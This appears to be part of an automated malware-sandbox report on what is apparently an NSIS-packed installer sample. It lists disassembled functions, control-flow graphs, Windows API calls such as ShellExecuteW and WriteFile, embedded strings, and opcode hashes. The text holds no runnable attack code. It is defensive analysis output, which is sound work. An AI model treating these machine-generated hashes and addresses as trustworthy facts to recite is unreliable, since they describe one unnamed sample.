                                                                                  • Associated: 00000000.00000002.2100900333.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2101006006.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
                                                                                  • String ID: FeesPhpbb$File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"
                                                                                  • API String ID: 4286501637-2090503459
                                                                                  • Opcode ID: 2ab80255bde4e5d1782dd9130ab292fdec73e4a72f9567b243a786bab725b233
                                                                                  • Instruction ID: fe683e2e252f9e2189d7cf48164ff2fe6631720e8c40e43e96375682ff159270
                                                                                  • Opcode Fuzzy Hash: 2ab80255bde4e5d1782dd9130ab292fdec73e4a72f9567b243a786bab725b233
                                                                                  • Instruction Fuzzy Hash: 9D510871901114BADF10BBB1CD46EAE3A68DF05369F21413FF416B10D2EB7C5A518AAE
                                                                                  Function 00403587 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 182COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 428 403587-4035d5 GetTickCount GetModuleFileNameW call 405e50 431 4035e1-40360f call 406009 call 406751 call 406009 GetFileSize 428->431 432 4035d7-4035dc 428->432 440 403615 431->440 441 4036fc-40370a call 4032d2 431->441 433 4037b6-4037ba 432->433 443 40361a-403631 440->443 447 403710-403713 441->447 448 4037c5-4037ca 441->448 445 403633 443->445 446 403635-403637 call 403336 443->446 445->446 452 40363c-40363e 446->452 450 403715-40372d call 403368 call 403336 447->450 451 40373f-403769 GlobalAlloc call 403368 call 40337f 447->451 448->433 450->448 478 403733-403739 450->478 451->448 476 40376b-40377c 451->476 454 403644-40364b 452->454 455 4037bd-4037c4 call 4032d2 452->455 460 4036c7-4036cb 454->460 461 40364d-403661 call 405e0c 454->461 455->448 464 4036d5-4036db 460->464 465 4036cd-4036d4 call 4032d2 460->465 461->464 475 403663-40366a 461->475 472 4036ea-4036f4 464->472 473 4036dd-4036e7 call 407281 464->473 465->464 472->443 477 4036fa 472->477 473->472 475->464 481 40366c-403673 475->481 482 403784-403787 476->482 483 40377e 476->483 477->441 478->448 478->451 481->464 484 403675-40367c 481->484 485 40378a-403792 482->485 483->482 484->464 486 40367e-403685 484->486 485->485 487 403794-4037af SetFilePointer call 405e0c 485->487 486->464 488 403687-4036a7 486->488 491 4037b4 487->491 488->448 490 4036ad-4036b1 488->490 492 4036b3-4036b7 490->492 493 4036b9-4036c1 490->493 491->433 492->477 492->493 493->464 494 4036c3-4036c5 493->494 494->464
                                                                                  APIs
                                                                                  • GetTickCount.KERNEL32 ref: 00403598
                                                                                  • GetModuleFileNameW.KERNEL32(00000000,004DF0D8,00002004,?,?,?,00000000,00403A47,?), ref: 004035B4
                                                                                    • Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                                                                    • Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                                                                  • GetFileSize.KERNEL32(00000000,00000000,004E30E0,00000000,004CF0B8,004CF0B8,004DF0D8,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00403600
                                                                                  Strings
                                                                                  • Inst, xrefs: 0040366C
                                                                                  • Error launching installer, xrefs: 004035D7
                                                                                  • soft, xrefs: 00403675
                                                                                  • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037C5
                                                                                  • Null, xrefs: 0040367E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2100845376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2100828574.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100866646.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2101006006.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                  • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                  • API String ID: 4283519449-527102705
                                                                                  • Opcode ID: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
                                                                                  • Instruction ID: 97831ba7e8e922ff386f77eab0e0d18630bd2de4bbb47cca7d976ce2c46b30f6
                                                                                  • Opcode Fuzzy Hash: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
                                                                                  • Instruction Fuzzy Hash: 3151D5B1900204AFDB219F65CD85B9E7EB8AB14756F10803FE605B72D1D77D9E808B9C
                                                                                  Function 0040337F Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 166fileCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 495 40337f-403396 496 403398 495->496 497 40339f-4033a7 495->497 496->497 498 4033a9 497->498 499 4033ae-4033b3 497->499 498->499 500 4033c3-4033d0 call 403336 499->500 501 4033b5-4033be call 403368 499->501 505 4033d2 500->505 506 4033da-4033e1 500->506 501->500 507 4033d4-4033d5 505->507 508 4033e7-403407 GetTickCount call 4072f2 506->508 509 403518-40351a 506->509 510 403539-40353d 507->510 521 403536 508->521 523 40340d-403415 508->523 511 40351c-40351f 509->511 512 40357f-403583 509->512 514 403521 511->514 515 403524-40352d call 403336 511->515 516 403540-403546 512->516 517 403585 512->517 514->515 515->505 530 403533 515->530 519 403548 516->519 520 40354b-403559 call 403336 516->520 517->521 519->520 520->505 532 40355f-403572 WriteFile 520->532 521->510 526 403417 523->526 527 40341a-403428 call 403336 523->527 526->527 527->505 533 40342a-403433 527->533 530->521 534 403511-403513 532->534 535 403574-403577 532->535 536 403439-403456 call 407312 533->536 534->507 535->534 537 403579-40357c 535->537 540 40350a-40350c 536->540 541 40345c-403473 GetTickCount 536->541 537->512 540->507 542 403475-40347d 541->542 543 4034be-4034c2 541->543 544 403485-4034bb MulDiv wsprintfW call 404f72 542->544 545 40347f-403483 542->545 546 4034c4-4034c7 543->546 547 4034ff-403502 543->547 544->543 545->543 545->544 550 4034e7-4034ed 546->550 551 4034c9-4034db WriteFile 546->551 547->523 548 403508 547->548 548->521 552 4034f3-4034f7 550->552 551->534 554 4034dd-4034e0 551->554 552->536 556 4034fd 552->556 554->534 555 4034e2-4034e5 554->555 555->552 556->521
                                                                                  APIs
                                                                                  • GetTickCount.KERNEL32 ref: 004033E7
                                                                                  • GetTickCount.KERNEL32 ref: 00403464
                                                                                  • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 00403491
                                                                                  • wsprintfW.USER32 ref: 004034A4
                                                                                  • WriteFile.KERNELBASE(00000000,00000000,?,7FFFFFFF,00000000), ref: 004034D3
                                                                                  • WriteFile.KERNEL32(00000000,0041F150,?,00000000,00000000,0041F150,?,000000FF,00000004,00000000,00000000,00000000), ref: 0040356A
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2100845376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2100828574.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100866646.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2101006006.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: CountFileTickWrite$wsprintf
                                                                                  • String ID: ... %d%%$P1B$X1C$X1C
                                                                                  • API String ID: 651206458-1535804072
                                                                                  • Opcode ID: 71a0af70068d15f1e2712f5ef5f0e4f02d53f291cdcd50b6d0822de58acd1dbf
                                                                                  • Instruction ID: 0313947f0097750978ec936bbe46de4fad37e772bc1cb17ec77dd8e30cfa9ece
                                                                                  • Opcode Fuzzy Hash: 71a0af70068d15f1e2712f5ef5f0e4f02d53f291cdcd50b6d0822de58acd1dbf
                                                                                  • Instruction Fuzzy Hash: 88518D71900219ABDF10DF65AE44AAF7BACAB00316F14417BF900B7290DB78DF40CBA9
                                                                                  Function 00401EB9 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 78COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 557 401eb9-401ec4 558 401f24-401f26 557->558 559 401ec6-401ec9 557->559 560 401f53-401f7b GlobalAlloc call 406805 558->560 561 401f28-401f2a 558->561 562 401ed5-401ee3 call 4062a3 559->562 563 401ecb-401ecf 559->563 576 4030e3-4030f2 560->576 577 402387-40238d GlobalFree 560->577 565 401f3c-401f4e call 406009 561->565 566 401f2c-401f36 call 4062a3 561->566 574 401ee4-402702 call 406805 562->574 563->559 567 401ed1-401ed3 563->567 565->577 566->565 567->562 573 401ef7-402e50 call 406009 * 3 567->573 573->576 589 402708-40270e 574->589 577->576 589->576
                                                                                  APIs
                                                                                    • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                                  • GlobalFree.KERNELBASE(007BA1F0), ref: 00402387
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2100845376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2100828574.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100866646.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2101006006.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: FreeGloballstrcpyn
                                                                                  • String ID: Exch: stack < %d elements$FeesPhpbb$Pop: stack empty
                                                                                  • API String ID: 1459762280-1288739872
                                                                                  • Opcode ID: 4c8c09c83ece9067cd01ebc7f99896dd0048823aea7dafec600988da42eaf391
                                                                                  • Instruction ID: ae7cb1f2c63b60d7baa415153617f8c61fd22799b34192a347ea6a0a5f6d971a
                                                                                  • Opcode Fuzzy Hash: 4c8c09c83ece9067cd01ebc7f99896dd0048823aea7dafec600988da42eaf391
                                                                                  • Instruction Fuzzy Hash: 4721D172601105EBE710EB95DD81A6F77A8EF44318B21003FF542F32D1EB7998118AAD
                                                                                  Function 004022FD Relevance: 7.6, APIs: 5, Instructions: 56memoryCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 592 4022fd-402325 call 40145c GetFileVersionInfoSizeW 595 4030e3-4030f2 592->595 596 40232b-402339 GlobalAlloc 592->596 596->595 597 40233f-40234e GetFileVersionInfoW 596->597 599 402350-402367 VerQueryValueW 597->599 600 402384-40238d GlobalFree 597->600 599->600 603 402369-402381 call 405f51 * 2 599->603 600->595 603->600
                                                                                  APIs
                                                                                  • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
                                                                                  • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
                                                                                  • GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
                                                                                  • VerQueryValueW.VERSION(?,00408838,?,?,?,?,?,00000000), ref: 00402360
                                                                                    • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                                                                  • GlobalFree.KERNELBASE(007BA1F0), ref: 00402387
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2100845376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2100828574.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100866646.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2101006006.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
                                                                                  • String ID:
                                                                                  • API String ID: 3376005127-0
                                                                                  • Opcode ID: 8c326ffdf613bec965b24eefbd291de90d56381beca0eea403caad45aa1d2aeb
                                                                                  • Instruction ID: 606d2f288e59f9406d2e88b5b0598c54d729d8d595f649ff0f3e4a994beab86c
                                                                                  • Opcode Fuzzy Hash: 8c326ffdf613bec965b24eefbd291de90d56381beca0eea403caad45aa1d2aeb
                                                                                  • Instruction Fuzzy Hash: 82115E72900109AFCF00EFA1DD45DAE7BB8EF04344F10403AFA09F61A1D7799A40DB19
                                                                                  Function 00402B23 Relevance: 7.6, APIs: 5, Instructions: 54memoryfilestringCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 608 402b23-402b37 GlobalAlloc 609 402b39-402b49 call 401446 608->609 610 402b4b-402b6a call 40145c WideCharToMultiByte lstrlenA 608->610 615 402b70-402b73 609->615 610->615 616 402b93 615->616 617 402b75-402b8d call 405f6a WriteFile 615->617 618 4030e3-4030f2 616->618 617->616 622 402384-40238d GlobalFree 617->622 622->618
                                                                                  APIs
                                                                                  • GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
                                                                                  • WideCharToMultiByte.KERNEL32(?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
                                                                                  • lstrlenA.KERNEL32(?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
                                                                                  • WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B85
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2100845376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2100828574.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100866646.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2101006006.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
                                                                                  • String ID:
                                                                                  • API String ID: 2568930968-0
                                                                                  • Opcode ID: a43f8298630559bd8253c369c7e0cb3863940d209ccab43e1d506770e08af364
                                                                                  • Instruction ID: 5d007b3c2ae3d1ce6b2586a1921c4ad46276280cee2e515d5d1d957ff8a092fa
                                                                                  • Opcode Fuzzy Hash: a43f8298630559bd8253c369c7e0cb3863940d209ccab43e1d506770e08af364
                                                                                  • Instruction Fuzzy Hash: 76016171500205FBDB14AF70DE48D9E3B78EF05359F10443AF646B91E1D6798982DB68
                                                                                  Function 00402713 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 625 402713-40273b call 406009 * 2 630 402746-402749 625->630 631 40273d-402743 call 40145c 625->631 633 402755-402758 630->633 634 40274b-402752 call 40145c 630->634 631->630 635 402764-40278c call 40145c call 4062a3 WritePrivateProfileStringW 633->635 636 40275a-402761 call 40145c 633->636 634->633 636->635
                                                                                  APIs
                                                                                    • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                                  • WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2100845376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2100828574.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100866646.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2101006006.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: PrivateProfileStringWritelstrcpyn
                                                                                  • String ID: <RM>$FeesPhpbb$WriteINIStr: wrote [%s] %s=%s in %s
                                                                                  • API String ID: 247603264-831220234
                                                                                  • Opcode ID: ebd727ba1388524afa6f7b5c72e47581e9b4ec966d204d2154218169f3a3a122
                                                                                  • Instruction ID: 1675f45263e21dacb3bd3d3c28f4c469aa899418fcec56767b4290250f933745
                                                                                  • Opcode Fuzzy Hash: ebd727ba1388524afa6f7b5c72e47581e9b4ec966d204d2154218169f3a3a122
                                                                                  • Instruction Fuzzy Hash: 05014F70D40319BADB10BFA18D859AF7A78AF09304F10403FF11A761E3D7B80A408BAD
                                                                                  Function 004021B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 732 4021b5-40220b call 40145c * 4 call 404f72 ShellExecuteW 743 402223-4030f2 call 4062a3 732->743 744 40220d-40221b call 4062a3 732->744 744->743
                                                                                  APIs
                                                                                    • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                                    • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                                    • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB), ref: 00404FCD
                                                                                    • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                                    • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                                    • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                                    • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                                  • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004CB0B0,?), ref: 00402202
                                                                                    • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                    • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                  Strings
                                                                                  • ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
                                                                                  • ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2100845376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2100828574.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100866646.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2101006006.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
                                                                                  • String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
                                                                                  • API String ID: 3156913733-2180253247
                                                                                  • Opcode ID: a6f9f0949098482436c6c9f8cce42b162511fb53d9db31c2e6f8192b5b466978
                                                                                  • Instruction ID: bbc106df3db47d5a89d2587a4e22f40687ed87c50c6518a2742e337a88eb4af1
                                                                                  • Opcode Fuzzy Hash: a6f9f0949098482436c6c9f8cce42b162511fb53d9db31c2e6f8192b5b466978
                                                                                  • Instruction Fuzzy Hash: E001F7B2B4021476DB2077B69C87F6B2A5CDB41764B20047BF502F20E3E5BD88009139
                                                                                  Function 00405E7F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 752 405e7f-405e8b 753 405e8c-405ec0 GetTickCount GetTempFileNameW 752->753 754 405ec2-405ec4 753->754 755 405ecf-405ed1 753->755 754->753 757 405ec6 754->757 756 405ec9-405ecc 755->756 757->756
                                                                                  APIs
                                                                                  • GetTickCount.KERNEL32 ref: 00405E9D
                                                                                  • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,004037FE,004D30C0,004D70C8), ref: 00405EB8
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2100845376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2100828574.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100866646.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2101006006.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: CountFileNameTempTick
                                                                                  • String ID: nsa
                                                                                  • API String ID: 1716503409-2209301699
                                                                                  • Opcode ID: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
                                                                                  • Instruction ID: bbb7b3741c82bae03d84fc31e008e00914f4f4b6280f54d22115683b6c602e07
                                                                                  • Opcode Fuzzy Hash: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
                                                                                  • Instruction Fuzzy Hash: 39F0F635600604BBDB00CF55DD05A9FBBBDEF90310F00803BE944E7140E6B09E00C798
                                                                                  Function 004078C5 Relevance: 5.2, APIs: 4, Instructions: 238COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 758 4078c5-4078cb 759 4078d0-4078eb 758->759 760 4078cd-4078cf 758->760 761 407aeb-407aff 759->761 762 407bad-407bba 759->762 760->759 764 407b01-407b17 761->764 765 407b19-407b2c 761->765 763 407be7-407beb 762->763 766 407c4a-407c5d 763->766 767 407bed-407c0c 763->767 768 407b33-407b3a 764->768 765->768 771 407c65-407c68 766->771 772 407c25-407c39 767->772 773 407c0e-407c23 767->773 769 407b61-407b64 768->769 770 407b3c-407b40 768->770 769->771 774 407b46-407b5e 770->774 775 407ccd-407cd4 770->775 779 407350 771->779 780 407cec 771->780 776 407c3c-407c43 772->776 773->776 774->769 778 407cdd-407cea 775->778 781 407be1-407be4 776->781 782 407c45 776->782 783 407cef-407cf6 778->783 784 407357-40735b 779->784 785 40749b-4074b6 779->785 786 40746d-407471 779->786 787 4073ff-407403 779->787 780->783 781->763 789 407cd6 782->789 790 407bc6-407bde 782->790 784->778 792 407361-40736e 784->792 785->761 793 407c76-407c7d 786->793 794 407477-40748b 786->794 795 407409-407420 787->795 796 407c6d-407c74 787->796 789->778 790->781 792->780 797 407374-4073ba 792->797 793->778 798 40748e-407496 794->798 799 407423-407427 795->799 796->778 801 4073e2-4073e4 797->801 802 4073bc-4073c0 797->802 798->786 803 407498 798->803 799->787 800 407429-40742f 799->800 804 407431-407438 800->804 805 407459-40746b 800->805 808 4073f5-4073fd 801->808 809 4073e6-4073f3 801->809 806 4073c2-4073c5 GlobalFree 802->806 807 4073cb-4073d9 GlobalAlloc 802->807 803->785 810 407443-407453 GlobalAlloc 804->810 811 40743a-40743d GlobalFree 804->811 805->798 806->807 807->780 812 4073df 807->812 808->799 809->808 809->809 810->780 810->805 811->810 812->801
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2100845376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2100828574.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100866646.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2101006006.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 34a0988d6b53cb3e5c5cab68a25a042cd6e02f2342b0fd139447399893daab40
                                                                                  • Instruction ID: 5b61ba0e549d4a34e11b5feda41afe9ae6537485a044c30e59ebd23bda5797f4
                                                                                  • Opcode Fuzzy Hash: 34a0988d6b53cb3e5c5cab68a25a042cd6e02f2342b0fd139447399893daab40
